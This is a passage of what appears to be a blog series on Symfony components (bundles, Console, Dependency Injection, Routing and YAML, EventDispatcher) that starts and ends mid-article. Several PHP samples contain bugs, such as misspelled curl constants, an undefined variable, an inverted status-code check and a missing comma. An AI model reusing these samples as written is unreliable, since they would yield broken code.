kernel.event_listener namekernel.request)onKernelRequest)0, the greater the sooner it will be executed)To complete the step, we need to register it in our bundle:
<?php
// VendorNanoFrameworkBundle.php
namespace Vendor\NanoFrameworkBundle;
use Symfony\Component\HttpKernel\Bundle\Bundle;
use Vendor\NanoFrameworkBundle\DependencyInjection\CompilerPass\AddListenersPass;
class VendorNanoFrameworkBundle extends Bundle
{
public function build(ContainerBuilder $container)
{
parent::build($container);
$container->addCompilerPass(new AddListenersPass());
}
}
Note: While
CompilerPassInterfaceimplementations need to be registered explicitly, there is no need to do anything forExtensionInterfaceimplementations asBundlecontains a method able to locate it, based on the following conventions:
- it needs to be in
DependencyInjectiondirectory- it needs to be named after the bundle name (replace
Bundlesuffix byExtension)- it needs to implement
ExtensionInterface
HttpKernel relies on event listeners for the routing, in order to enable it we need to add the following configuration:
# Resources/config/services/routing.yml
services:
router_listener:
class: Symfony\Component\HttpKernel\EventListener\RouterListener
arguments:
- "@router"
- "@request_stack"
- "@router.request_context"
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest, priority: 32 }
router:
class: Symfony\Component\Routing\Router
public: false
arguments:
- "@routing.loader"
- "%kernel.root_dir%/config/routings"
- "%router.options%"
- "@router.request_context"
calls:
- [setConfigCacheFactory, ["@config_cache_factory"]]
routing.loader:
class: Symfony\Component\Config\Loader\DelegatingLoader
public: false
arguments:
- "@routing.resolver"
routing.resolver:
class: Symfony\Component\Config\Loader\LoaderResolver
public: false
calls:
- [addLoader, ["@routing.loader.yml"]]
router.request_context:
class: Symfony\Component\Routing\RequestContext
public: false
config_cache_factory:
class: Symfony\Component\Config\ResourceCheckerConfigCacheFactory
public: false
routing.loader.yml:
class: Symfony\Component\Routing\Loader\YamlFileLoader
public: false
arguments:
- "@file_locator"
Since Kernel is an abstract class, we need to create an implementation (usually
called AppKernel):
<?php
// Tests/app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
class AppKernel extends Kernel
{
public function registerBundles()
{
return array(
new Vendor\NanoFrameworkBundle\VendorNanoFrameworkBundle(),
);
}
public function getRootDir()
{
return __DIR__;
}
public function getCacheDir()
{
return dirname(__DIR__).'/var/cache/'.$this->getEnvironment();
}
public function getLogDir()
{
return dirname(__DIR__).'/var/logs';
}
}
Finally we need to create a "Front Controller" (a fancy name for index.php):
<?php
// Tests/web/index.php
<?php
use Symfony\Component\HttpFoundation\Request;
$kernel = new AppKernel('prod', false);
$request = Request::createFromGlobals();
$response = $kernel->handle($request);
$response->send();
$kernel->terminate($request, $response);
Bundles enable us to define classes as Dependency Injection services, for our applications and third part libraries in a reusable way.
In the example above we've created a bundle that provides a http_kernel service,
which can then be used to create Symfony applications. Here are some existing
bundles that do it for us:
There are many bundles available, you can find them by checking symfony-bundle in Packagist.
]]>Reference: This article is intended to be as complete as possible and is kept up to date.
TL;DR: $statusCode = $application->run($input);
In this guide we explore the standalone libraries (also known as "Components") provided by Symfony to help us build applications.
We've already seen:
We're now about to check the last one: Console.
In the next articles we'll also see how HttpKernel enables reusable code with Bundles, and the different ways to organize our application tree directory.
Finally we'll finish by putting all this knowledge in practice by creating a "fortune" project with:
Symfony provides a Console component
which allows us to create CLI commands. Its main class is Application:
<?php
namespace Symfony\Component\Console;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;
use Symfony\Component\Console\Command\Command;
class Application
{
public function __construct($name = 'UNKNOWN', $version = 'UNKNOWN');
public function add(Command $command);
public function setDefaultCommand($commandName);
public function run(InputInterface $input = null, OutputInterface $output = null);
public function setAutoExit($boolean);
}
Note: This snippet is a truncated version. Please note that
Applicationis (unfortunately) not an interface.
We can create it as follow:
<?php
// /tmp/console.php
use Symfony\Component\Console\Application;
use Symfony\Component\Console\Input\ArgvInput;
$application = new Application('My Application', 'v4.2.3');
$application->add($command);
$application->setDefaultCommand($command->getName());
$application->run(new ArgvInput());
Which can then be used as follow:
php /tmp/console.php
Note: After running the command,
Applicationwill automatically stop usingexit. As it can sometimes be inconvenient (for example in tests), we can disable it with this line:$application->setAutoExit(false);
Out of the box, Application has two commands:
list, list all available commands (it's the default command if setDefaultCommand hasn't been used)help, displays a description with available arguments and options for the current commandIn order for Application to be useful, we need to create commands. This can be
done by extending Command:
<?php
namespace Symfony\Component\Console\Command;
use Symfony\Component\Console\Input\InputArgument;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Input\InputOption;
use Symfony\Component\Console\Output\OutputInterface;
class Command
{
public function run(InputInterface $input, OutputInterface $output);
// Called by run
protected function execute(InputInterface $input, OutputInterface $output);
protected function interact(InputInterface $input, OutputInterface $output);
protected function configure();
// To be called in configure
public function setName($name);
public function addArgument($name, $mode = null, $description = '', $default = null);
public function addOption($name, $shortcut = null, $mode = null, $description = '', $default = null);
public function setDescription($description);
public function setHelp($help);
public function setAliases($aliases);
}
We can configure the command (name, arguments, options, description, etc) in the
configure method, we can define more options to be asked interractively in
the interact method (e.g. Are you sure? (Y/n)) and finally we can write the
command logic in the execute method.
Commands are to Console what Controllers are to HttpKernel: their responsibility is to extract input parameters, pass them to a service and then put the service's returned value in the output.
Input parameters are wrapped in the following interface:
<?php
namespace Symfony\Component\Console\Input;
interface InputInterface
{
public function getArgument($name);
public function getOption($name);
}
Out of the box we have the following implementations:
ArgvInput: wraps CLI arguments comming from $_SERVER['argv']ArrayInput: define arguments using an array, which is useful for testsApplication will take care of validating InputInterface parameters against
the Command configuration (e.g. if required arguments present).
While InputInterface can be seen as a value object, OutputInterface should
be seen as a service able to send informations to a stream:
<?php
namespace Symfony\Component\Console\Output;
abstract class Output implements OutputInterface
{
public function writeln($messages, $type = self::OUTPUT_NORMAL);
}
The writeln method allows us to write a new line (with a newline character at
the end). If the given message is an array, it will print each elements on a new
line.
The given message can contain tags (e.g. Arthur <info>Dent</info>), which can
be used to format it. Out of the box it will color the followings:
<info>Arthur Dent</info>)<comment>Tricia McMillan</comment>)<question>Ford Prefect</question>)<error>Marvin</error>)The Console component allows us to create CLI applications. Its Commands are a thin layer which gathers the input and call services. Those services can then output messages to the user.
]]>Note: Since Symfony follows a Console Output Formating Style Guide, the Console component provides the following helper class:
<?php namespace Symfony\Component\Console\Style; use Symfony\Component\Console\Input\InputInterface; use Symfony\Component\Console\Output\OutputInterface; use Symfony\Component\Console\Question\Question; class SymfonyStyle { public function __construct(InputInterface $input, OutputInterface $output); public function block($messages, $type = null, $style = null, $prefix = ' ', $padding = false); public function title($message); public function section($message); public function listing(array $elements); public function text($message); public function comment($message); public function success($message); public function error($message); public function warning($message); public function note($message); public function caution($message); public function table(array $headers, array $rows); public function ask($question, $default = null, $validator = null); public function askHidden($question, $validator = null); public function confirm($question, $default = true); public function choice($question, array $choices, $default = null); public function askQuestion(Question $question); public function progressStart($max = 0); public function progressAdvance($step = 1); public function progressFinish(); public function createProgressBar($max = 0); public function writeln($messages, $type = self::OUTPUT_NORMAL); public function write($messages, $newline = false, $type = self::OUTPUT_NORMAL); public function newLine($count = 1); }
Reference: This article is intended to be as complete as possible and is kept up to date.
TL;DR: Make Dependency Injection easy by moving class construction in configuration files.
In this guide we explore the standalone libraries (also known as "Components") provided by Symfony to help us build applications.
We've already seen:
We're now about to check Dependency Injection, then the next article we'll have a look at Console.
We'll also see how HttpKernel enables reusable code with Bundles, and the different ways to organize our application tree directory.
Finally we'll finish by putting all this knowledge in practice by creating a "fortune" project with:
When first creating a class, we tend to keep it small and tidy. Then overtime it can grow out of control and the next thing we know it became this multi thousand line monster:
<?php
class CheckApiStatus
{
public function check($url)
{
$curl = curl_init();
curl_setopt_array($curl, array(
CUROPT_RETURNTRANSFER => true,
CURLOPT_HEADER => true,
CUROPT_URL => $url,
));
$response = curl_exec($curl);
$headerSize = curl_getinfo($curl, CURLINFO_HEADER_SIZE);
$statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
curl_close($curl);
$headers = array_map(function($line) {
return explode(': ', trim($line));
}, explode("\n", substr($response, 0, $size)));
array_pop($headers);array_pop($headers);array_shift($headers);
$body = substr($response, $headerSize);
return 200 >= $statusCode && $statusCode < 400;
}
}
A nice way to shrink it back to an acceptable level is to identify the many "responsibilities" it bears and split those in sub classes. This process is called refactoring:
<?php
class Request
{
private $uri;
public function __construct($uri)
{
$this->uri;
}
public function getUri()
{
return $this->uri;
}
}
class Response
{
private $statusCode;
private $headers;
private $body;
public function __construct($statusCode, $headers, $body)
{
$this->statusCode = $statusCode;
$this->headers = $headers;
$this->body = $body;
}
public function getStatusCode()
{
return $this->statusCode;
}
public function getHeaders()
{
return $this->headers;
}
public function getBody()
{
return $this->body;
}
}
interface HttpClient
{
/**
* @return Response
*/
public function sendRequest(Request $request);
}
class CurlHttpClient implements HttpClient
{
public function sendRequest(Request $request)
{
$curl = curl_init();
curl_setopt_array($curl, array(
CUROPT_RETURNTRANSFER => true,
CURLOPT_HEADER => true,
CUROPT_URL => $request->getUri(),
));
$response = curl_exec($curl);
$headerSize = curl_getinfo($curl, CURLINFO_HEADER_SIZE);
$statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
curl_close($curl);
$headers = array_map(function($line) {
return explode(': ', trim($line));
}, explode("\n", substr($response, 0, $size)));
array_pop($headers);array_pop($headers);array_shift($headers);
$body = substr($response, $headerSize);
$body = substr($response, $headerSize);
return new Response($statusCode, $headers, $body);
}
}
class CheckApiStatus
{
public function check($url)
{
$httpClient = new CurlHttpClient();
$statusCode = $httpClient->sendRequest(new Request($url))->getStatusCode();
return 200 >= $statusCode && $statusCode < 400;
}
}
Note: for more refactoring examples, check:
- Refactoring external service by Martin Fowler
- Extract till you drop by Mathias Verreas
- Refactoring the cat API part 1 part 2 part 3 by Matthias Noback
Our original class then has to call those sub classes to "delegate" the work. But how does it access those sub classes? Should it instantiate them in its methods? A better place could be the constructor, where the instances are stored in the class properties so it can be shared between two calls.
Or even better we can instantiate them out of the class, and then pass them as arguments to the original class constructor, so we can share it with other classes:
<?php
class CheckApiStatus
{
private $httpClient;
public function __construct(HttpClient $httpClient)
{
$this->httpClient = $httpClient;
}
public function check($url)
{
$statusCode = $this->httpClient->sendRequest(new Request($url))->getStatusCode();
return 200 >= $statusCode && $statusCode < 400;
}
}
$httpClient = new CurlHttpClient();
$checkApiStatus = new CheckApiStatus($httpClient);
Note: Now
CheckApiStatusis decoupled from the remote request logic.The refactoring steps might seem like producing more code just for the "beauty" of principles, but it actually enables us to completly remove it: by using PSR-7 interfaces instead of our own we can easily switch to Guzzle or any HTTP client library.
And that's what Dependency Injection is all about: taking parameters (also known as dependencies) our class (also known as service) needs and pass them as arguments (also known as injection), to allow more decoupling.
The downside of this design pattern is that we now have a cascade of instantiations.
Note: Classes can be shared if they are stateless which means calling a method shouldn't change their attributes.
Symfony provides a Dependency Injection component which allows us to set up how our classes are constructed:
<?php
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Reference;
$container = new ContainerBuilder();
$container
->register('http_client','CurlHttpClient')
;
$container
->register('check_api_status', 'CheckApiStatus')
->addArgument(new Reference('http_client'))
;
$checkApiStatus = $container->get('check_api_status');
It can even be set up using configuration:
# /tmp/services/api.yml
services:
http_client:
class: CurlHttpClient
check_api_status:
class: CheckApiStatus
arguments:
- '@http_client'
Note: Some string values must be escaped using single quotes because YAML has a list of reserved characters, including:
@,%,\,-,:[,],{and}.
Here's how we can load this configuration:
<?php
use Symfony\Component\Config\FileLocator;
use Symfony\Component\Config\Loader\LoaderResolver;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Loader\DirectoryLoader;
use Symfony\Component\DependencyInjection\Loader\YamlFileLoader;
$container = new ContainerBuilder();
// Load recursively all YAML configuration files in services directories
$fileLocator = new FileLocator(__DIR__);
$loader = new DirectoryLoader($container, $fileLocator);
$loader->setResolver(new LoaderResolver(array(
new YamlFileLoader($container, $fileLocator),
$loader,
)));
$loader->load('/services/');
$checkApiStatus = $container->get('check_api_status');
Calling methods on a created service to complete its initialization is possible:
services:
my_event_listener:
class: MyEventListener
event_dispatcher:
class: 'Symfony\Component\EventDispatcher\EventDispatcher'
calls:
- [ addListener, [ kernel.request, '@my_event_listener', 42 ] ]
Note: There's a better way to add listeners to the EventDispatcher, keep reading to find out how.
Finally it might be useful to create aliases:
services:
http_client:
alias: curl_http_client
curl_http_client:
class: CurlHttpClient
check_api_status:
class: checkApiStatus
arguments:
- "@http_client"
In the example above http_client is set to be curl_http_client, it could be
changed later to use another implementation of HttpClient.
In addition to class instances, we can also inject parameters:
<?php
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Parameter;
use Symfony\Component\DependencyInjection\Reference;
$container = new ContainerBuilder();
$container->setParameter('username', 'arthur.dent@example.com');
$container->setParameter('password', 42);
$container
->register('http_client','CurlHttpClient')
;
$container
->register('check_api_status', 'CheckApiStatus')
->addArgument(new Reference('http_client'))
->addArgument(new Parameter('username'))
->addArgument(new Parameter('password'))
;
$checkApiStatus = $container->get('check_api_status');
Note: For the example's sake we're pretending that
CheckApiStatus's constructor now takes 3 arguments.
Here's the equivalent in YAML:
# /tmp/services/api.yml
parameters:
username: 'arthur.dent@example.com'
password: 42
services:
http_client:
class: CurlHttpClient
check_api_status:
class: CheckApiStatus
arguments:
- '@http_client'
- '%username%'
- '%password%'
Note: services are prefixed with
@, and parameters are surrounded with%.
The value of a parameter can be anything:
~)true or false)42)44.23)hello world, or escaped 'arthur.dent@example.com')[ apples, oranges ]){ first_name: Arthur, last_name: Dent })Note: The examples above for arrays are inline ones. They could also be on many lines:
parameters: fruits: - apples - oranges identity: first_name: Arthur last_name: Dent # We can even have multi dimension arrays: five_a_day: - - apples - oranges - - carrots
By creating a class that extends Extension, we can provide reusable Dependency
Injection configuration:
<?php
use Symfony\Component\Config\FileLocator;
use Symfony\Component\Config\Loader\LoaderResolver;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Loader\DirectoryLoader;
use Symfony\Component\DependencyInjection\Loader\YamlFileLoader;
use Symfony\Component\HttpKernel\DependencyInjection\Extension;
class AppExtension extends Extension
{
public function load(array $configs, ContainerBuilder $container)
{
$fileLocator = new FileLocator(__DIR__);
$loader = new DirectoryLoader($container, $fileLocator);
$loader->setResolver(new LoaderResolver(array(
new YamlFileLoader($container, $fileLocator),
$loader,
)));
$loader->load('/services/');
}
}
$container = new ContainerBuilder();
$appExtension = new AppExtension();
$appExtension->load(array(), $container);
$checkApiStatus = $container->get('check_api_status');
The Container implementation provides a compile method that resolves parameters
(replace %parameter% placeholders by the parameter value) and freezes them
(calling setParameter will result in an exception).
The ContainerBuilder implementations also has a compile method which is going
to execute all registered CompilerPassInterface implementations.
For example, we can retrieve all services "tagged" kernel.event_listener and
add them to the EventDispatcher with the following one:
<?php
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Compiler\CompilerPassInterface;
use Symfony\Component\DependencyInjection\Reference;
class EventListenerCompilerPass implements CompilerPassInterface
{
public function process(ContainerBuilder $container)
{
if (false === $container->hasDefinition('event_dispatcher')) {
return;
}
$eventDispatcher = $container->getDefinition('event_dispatcher');
$taggedServices = $container->findTaggedServiceIds('kernel.event_listener');
foreach ($taggedServices as $id => $attributes) {
$eventDispatcher->addMethodCall('addListener', array(
$attributes['event'],
array(new Reference($id), $attributes['method']),
$attributes['priority'],
));
}
}
}
Note: The EventDispatcher component already provides a
RegisterListenersPass.
The configuration for a "tagged" service looks like this:
services:
my_event_listener:
class MyEventListener
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest, priority: 42 }
Note: With this, it is no longer required to call
addListenerinevent_dispatcher's configuration.
By providing a configurable way to define service construction, the DependencyInjection component allows us to use the design pattern of the same name in our projects.
The HttpKernel component provides two HttpKernelInterface implementations:
HttpKernel which does the HTTP logicKernel which sets up a DependencyInjection container and then use HttpKernelJust like for the Routing component, there's a PhpDumper which can generate an
implementation of ContainerInterface with all configuration in an optimized way.
It might look like this:
<?php
use Symfony\Component\DependencyInjection\ContainerInterface;
use Symfony\Component\DependencyInjection\Container;
use Symfony\Component\DependencyInjection\Exception\InvalidArgumentException;
use Symfony\Component\DependencyInjection\Exception\LogicException;
use Symfony\Component\DependencyInjection\Exception\RuntimeException;
use Symfony\Component\DependencyInjection\ParameterBag\FrozenParameterBag;
class appDevDebugProjectContainer extends Container
{
private $parameters;
private $targetDirs = array();
public function __construct()
{
$dir = __DIR__;
for ($i = 1; $i <= 5; ++$i) {
$this->targetDirs[$i] = $dir = dirname($dir);
}
$this->parameters = $this->getDefaultParameters();
$this->services = array();
$this->methodMap = array(
'http_client' => 'getHttpClientService',
'check_api_status' => 'getCheckApiStatusService',
);
$this->aliases = array(
);
}
public function compile()
{
throw new LogicException('You cannot compile a dumped frozen container.');
}
protected function getHttpClientService()
{
return $this->services['http_client'] = new \CurlHttpClient();
}
protected function getCheckApiStatusService()
{
return $this->services['check_api_status'] = new \CheckApiStatus($this->get('http_client'), 'arthur.dent@example.com', 42);
}
public function getParameter($name)
{
$name = strtolower($name);
if (!(isset($this->parameters[$name]) || array_key_exists($name, $this->parameters))) {
throw new InvalidArgumentException(sprintf('The parameter "%s" must be defined.', $name));
}
return $this->parameters[$name];
}
public function hasParameter($name)
{
$name = strtolower($name);
return isset($this->parameters[$name]) || array_key_exists($name, $this->parameters);
}
public function setParameter($name, $value)
{
throw new LogicException('Impossible to call set() on a frozen ParameterBag.');
}
public function getParameterBag()
{
if (null === $this->parameterBag) {
$this->parameterBag = new FrozenParameterBag($this->parameters);
}
return $this->parameterBag;
}
protected function getDefaultParameters()
{
return array(
'username' => 'arthur.dent@example.com',
'password' => 42,
);
}
}
Note: Dependencies that are used by only one service can be marked as "private" they'll be hard coded in the service instantiation (but they won't be available anymore from
$container->get()).In our example we could mark
http_clientas private, so the dumped Container wouldn't have agetHttpClientServicemethod:service: http_client: class: CurlHttpClient public: false
It is also worth noting that services are by default only initialized once and on demand, so the number of services doesn't impact the performances of the application.
]]>Reference: This article is intended to be as complete as possible and is kept up to date.
TL;DR:
$parameters = $urlMatcher->match($request->getPathInfo());
$request->attributes->add(array('_controller' => $parameters['_controller']);
$request->attributes->add(array('_route' => $parameters['_route']);
unset($parameters['_controller'], $parameters['_route']);
$request->attributes->add(array('_route_params' => $parameters);
In this guide we explore the standalone libraries (also known as "Components") provided by Symfony to help us build applications.
We've already seen:
We're now about to check Routing and YAML, then in the next articles we'll have a look at:
We'll also see how HttpKernel enables reusable code with Bundles, and the different ways to organize our application tree directory.
Finally we'll finish by putting all this knowledge in practice by creating a "fortune" project with:
Symfony provides a Routing component which allows us, for a HTTP request/URL, to execute a specific function (also known as "Controller").
Note: Controllers must be a callable, for example:
- an anonymous function:
$controller = function (Request $request) { return new Response() };.- an array with an instance of a class and a method name:
$controller = array($controller, 'searchArticles');.- a fully qualified classname with a static method name:
$controller = 'Vendor\Project\Controller\ArticleController::searchArticles'.Controllers can take a Request argument and should return a Response instance.
It revolves around the following interface:
<?php
namespace Symfony\Component\Routing\Matcher;
use Symfony\Component\Routing\Exception\ResourceNotFoundException;
use Symfony\Component\Routing\Exception\MethodNotAllowedException;
interface UrlMatcherInterface
{
/**
* @param string $pathinfo
*
* @return array Route parameters (also contains `_route`)
*
* @throws ResourceNotFoundException
* @throws MethodNotAllowedException
*/
public function match($pathinfo);
}
Note: For brevity the interface has been stripped from
RequestContextAwareInterface.
In actual applications we don't need to implement it as the component provides
a nice implementation that works with RouteCollection:
<?php
use Symfony\Component\Routing\RouteCollection;
use Symfony\Component\Routing\Route;
$collection = new RouteCollection();
$collection->add('search_articles', new Route('/v1/articles', array(
'_controller' => 'Vendor\Project\Controller\ArticleController::search',
), array(), array(), '', array(), array('GET', 'HEAD')));
$collection->add('edit_article', new Route('/v1/articles/{id}', array(
'_controller' => 'Vendor\Project\Controller\ArticleController::edit',
), array(), array(), '', array(), array('PUT')));
RouteCollection allows us to configure which Request will match our controllers:
via URL patterns and Request method. It also allows us to specify parts of the URLs
as URI parameters (e.g. id in the above snippet).
Building route configuration by interacting with PHP code can be tedious, so the Routing component supports alternative configuration formats: annotations, XML, YAML, etc.
Tip: have a look at
Symfony\Component\Routing\Loader\YamlFileLoader.
Symfony provides a YAML component which allows us to convert YAML configuration into PHP arrays (and vice versa).
For example the following YAML file:
# /tmp/routing.yml
search_articles:
path: /api/articles
defaults:
_controller: 'Vendor\Project\Controller\ArticleController::search'
methods:
- GET
- HEAD
edit_article:
path: '/api/articles/{id}'
defaults:
_controller: 'Vendor\Project\Controller\ArticleController::edit'
methods:
- PUT
Note: Some string values must be escaped using single quotes because the YAML has a list of reserved characters, including:
@,%,\,-,:[,],{and}.
Can be converted using:
<?php
use Symfony\Component\Yaml\Yaml;
$routing = Yaml::parse(file_get_contents('/tmp/routing.yml'));
This will result in the equivalent of the following array:
<?php
$routing = array(
'search_articles' => array(
'path' => '/api/articles',
'defaults' => array(
'_controller' => 'Vendor\Project\Controller\ArticleController::search',
),
'methods' => array(
'GET',
'HEAD',
),
),
'edit_article' => array(
'path' => '/api/articles/{id}',
'defaults' => array(
'_controller' => 'Vendor\Project\Controller\ArticleController::edit',
),
'methods' => array(
'PUT',
),
),
);
Note: the Routing component uses another component to then build
RouteCollectionfrom this array: the Config component which is out of the scope of this guide.
There's also $yaml = Yaml::dump($array); that converts a PHP array into a YAML
string.
The Routing component allows us to define which Controllers should be executed for the given Request, and the Yaml component allows us to configure it in a simple way.
HttpKernel provides a RouterListener which makes use of UrlMatcher when the
Request is received to find a corresponding controller.
Note:
Request->attributesis used to store information about the current Request such as the matched route, the controller, etc. It's used internally by Symfony but we could also store our own values in it.
Some might be concerned with performance: reading the configuration from the filesystem may slow down the application.
Don't panic! There's a PhpMatcherDumper class which can generate an implementation
of UrlMatcherInterface with all configuration in an optimized way. It might look
like this:
<?php
use Symfony\Component\Routing\Exception\MethodNotAllowedException;
use Symfony\Component\Routing\Exception\ResourceNotFoundException;
use Symfony\Component\Routing\RequestContext;
class appDevUrlMatcher extends Symfony\Bundle\FrameworkBundle\Routing\RedirectableUrlMatcher
{
public function __construct(RequestContext $context)
{
$this->context = $context;
}
public function match($pathinfo)
{
$allow = array();
$pathinfo = rawurldecode($pathinfo);
$context = $this->context;
// edit_article
if (preg_match('#^/v1/articles/(?P<id>[^/]++)$#s', $pathinfo, $matches)) {
if ($this->context->getMethod() != 'PUT') {
$allow[] = 'PUT';
goto not_edit_article;
}
return $this->mergeDefaults(array_replace($matches, array('_route' => 'edit_article')), array ( '_controller' => 'Vendor\Project\Controller\ArticleController::edit',));
}
not_edit_article:
// search_articles
if ($pathinfo === '/v1/articles') {
if (!in_array($this->context->getMethod(), array('GET', 'HEAD'))) {
$allow = array_merge($allow, array('GET', 'HEAD'));
goto not_search_articles;
}
return array ( '_controller' => 'app.article_controller:search', '_route' => 'Vendor\Project\Controller\ArticleController::search',);
}
not_search_articles:
throw 0 < count($allow) ? new MethodNotAllowedException(array_unique($allow)) : new ResourceNotFoundException();
}
}
]]>Reference: This article is intended to be as complete as possible and is kept up to date.
TL;DR:
$eventDispatcher->addListener($eventName, $listener1, $priority);
$eventDispatcher->addListener($eventName, $listener2, $priority - 1);
$eventDispatcher->dispatch($eventName); // Calls $listener1, then $listener2
In this guide we explore the standalone libraries (also known as "Components") provided by Symfony to help us build applications.
We've already seen:
We're now about to check Event Dispatcher, then in the next articles we'll have a look at:
We'll also see how HttpKernel enables reusable code with Bundles, and the different ways to organize our application tree directory.
Finally we'll finish by putting all this knowledge in practice by creating a "fortune" project with:
Symfony provides an EventDispatcher component which allows the execution of registered function at key points in our applications.
It revolves around the following interface:
<?php
namespace Symfony\Component\EventDispatcher;
interface EventDispatcherInterface
{
/**
* @param string $eventName
* @param callable $listener
* @param int $priority High priority listeners will be executed first
*/
public function addListener($eventName, $listener, $priority = 0);
/**
* @param string $eventName
* @param Event $event
*/
public function dispatch($eventName, Event $event = null);
}
Note: This snippet is a truncated version, the actual interface has methods to add/remove/get/check listeners and subscribers (which are "auto-configured" listeners).
An implementation is provided out of the box and can be used as follow:
<?php
use Symfony\Component\EventDispatcher\EventDispatcher;
$eventDispatcher = new EventDispatcher();
$eventDispatcher->addListener('something_happened', function () {
echo "Log it\n";
}, 1);
$eventDispatcher->addListener('something_happened', function () {
echo "Save it\n";
}, 2);
$eventDispatcher->dispatch('something_happened');
This will output:
Save it
Log it
Since the second listener had a higher priority, it got executed first.
Note: Listeners must be a callable, for example:
- an anonymous function:
$listener = function (Event $event) {};.- an array with an instance of a class and a method name:
$listener = array($service, 'method');.- a fully qualified classname with a static method name:
$listener = 'Vendor\Project\Service::staticMethod'.
If we want to provide some context to the listeners (parameters, etc) we can
create a sub-class of Event:
<?php
use Symfony\Component\EventDispatcher\Event;
use Symfony\Component\EventDispatcher\EventDispatcher;
class SomethingHappenedEvent extends Event
{
private $who;
private $what;
private $when;
public function __construct($who, $what)
{
$this->who = $who;
$this->what = $what;
$this->when = new \DateTime();
}
public function who()
{
return $this->who;
}
public function what()
{
return $this->what;
}
public function when()
{
return $this->when;
}
}
$eventDispatcher = new EventDispatcher();
$eventDispatcher->addListener('something_happened', function (SomethingHappenedEvent $event) {
echo "{$event->who()} was {$event->what()} at {$event->when()->format('Y/m/d H:i:s')}\n";
});
$eventDispatcher->dispatch('something_happened', new SomethingHappenedEvent('Arthur', 'hitchhiking'));
The HttpKernel component we've seen in the previous article
provides a Kernel abstract class that heavily relies on EventDispatcher.
For each key steps of its execution, it dispatches the following events:
kernel.request: gets a Requestkernel.controller: executes a callable (also known as "Controller")kernel.view: converts the Controller's returned value into a Response (if necessary)kernel.response: returns a ResponseAnd in case of error:
kernel.exception: handles errorsJust before returning the Response, HttpKernel dispatches one last event:
kernel.finish_request: clean ups, sending emails, etcAfter the Response has been displayed, we can dispatch:
kernel.terminate: same as kernel.finish_request, except it won't slow down
the rendering of request if FastCGI is enabledListeners that registered for kernel.request can modify the Request object.
Out of the box there's a RouterListener registered which sets the following
parameters in Request->attributes:
_route: the route name that matched the Request_controller: a callable that will handle the Request and return a Response_route_parameters: query parameters extracted from the RequestAn example of a custom Listener could be one that decodes JSON content and sets
it in Request->request:
<?php
namespace AppBundle\EventListener;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpKernel\Event\GetResponseEvent;
/**
* PHP does not populate $_POST with the data submitted via a JSON Request,
* causing an empty $request->request.
*
* This listener fixes this.
*/
class JsonRequestContentListener
{
/**
* @param GetResponseEvent $event
*/
public function onKernelRequest(GetResponseEvent $event)
{
$request = $event->getRequest();
$hasBeenSubmited = in_array($request->getMethod(), array('PATCH', 'POST', 'PUT'), true);
$isJson = (1 === preg_match('#application/json#', $request->headers->get('Content-Type')));
if (!$hasBeenSubmited || !$isJson) {
return;
}
$data = json_decode($request->getContent(), true);
if (JSON_ERROR_NONE !== json_last_error()) {
$event->setResponse(new Response('{"error":"Invalid or malformed JSON"}', 400, array('Content-Type' => 'application/json')));
}
$request->request->add($data ?: array());
}
}
Another example would be to start a database transaction:
<?php
namespace AppBundle\EventListener;
use PommProject\Foundation\QueryManager\QueryManagerInterface;
use Symfony\Component\HttpKernel\Event\GetResponseEvent;
class StartTransactionListener
{
/**
* @var QueryManagerInterface
*/
private $queryManager;
/**
* @param QueryManagerInterface $queryManager
*/
public function __construct(QueryManagerInterface $queryManager)
{
$this->queryManager = $queryManager;
}
/**
* @param GetResponseEvent $event
*/
public function onKernelRequest(GetResponseEvent $event)
{
$this->queryManager->query('START TRANSACTION');
}
}
Note: Pomm is used here as an example.
Listeners that registered for kernel.controller can modify the Request object.
This can be useful when we'd like to change the Controller.
For example SensioFrameworkExtraBundle has a ControllerListener that parses
the controller annotations at this point.
Listeners that registered for kernel.view can modify the Response object.
For example SensioFrameworkExtraBundle has a TemplateListener that uses @Template
annotation: controllers only need to return an array and the listener will create
a response using Twig (it will pass the array as
Twig parameters).
Listeners that registered for kernel.response can modify the Response object.
Out of the box there's a ResponseListener regitered which sets some Response
headers according to the Request's one.
Listeners that registered for kernel.terminate can execute actions after the
Response has been served (if our web server uses FastCGI).
An example of a custom Listener could be one that rollsback a database transaction, when running in test environment:
<?php
namespace AppBundle\EventListener\Pomm;
use PommProject\Foundation\QueryManager\QueryManagerInterface;
use Symfony\Component\HttpKernel\Event\PostResponseEvent;
class RollbackListener
{
/**
* @var QueryManagerInterface
*/
private $queryManager;
/**
* @param QueryManagerInterface $queryManager
*/
public function __construct(QueryManagerInterface $queryManager)
{
$this->queryManager = $queryManager;
}
/**
* @param PostResponseEvent $event
*/
public function onKernelTerminate(PostResponseEvent $event)
{
$this->queryManager->query('ROLLBACK');
}
}
Note: We'll se later how to register this listener only for test environment.
Listeners that registered for kernel.exception can catch an exception and generate
an appropriate Response object.
An example of a custom Listener could be one that logs debug information and generates a 500 Response:
<?php
namespace AppBundle\EventListener;
use Psr\Log\LoggerInterface;
use Ramsey\Uuid\Uuid;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpKernel\Event\GetResponseForExceptionEvent;
class ExceptionListener
{
/**
* @var LoggerInterface
*/
private $logger;
/**
* @param LoggerInterface $logger
*/
public function __construct(LoggerInterface $logger)
{
$this->logger = $logger;
}
/**
* @param GetResponseForExceptionEvent $event
*/
public function onKernelException(GetResponseForExceptionEvent $event)
{
$exception = $event->getException();
$token = Uuid::uuid4()->toString();
$this->logger->critical(
'Caught PHP Exception {class}: "{message}" at {file} line {line}',
array(
'class' => get_class($exception),
'message' => $exception->getMessage(),
'file' => $exception->getFile(),
'line' => $exception->getLine()
'exception' => $exception,
'token' => $token
)
);
$event->setResponse(new Response(
json_encode(array(
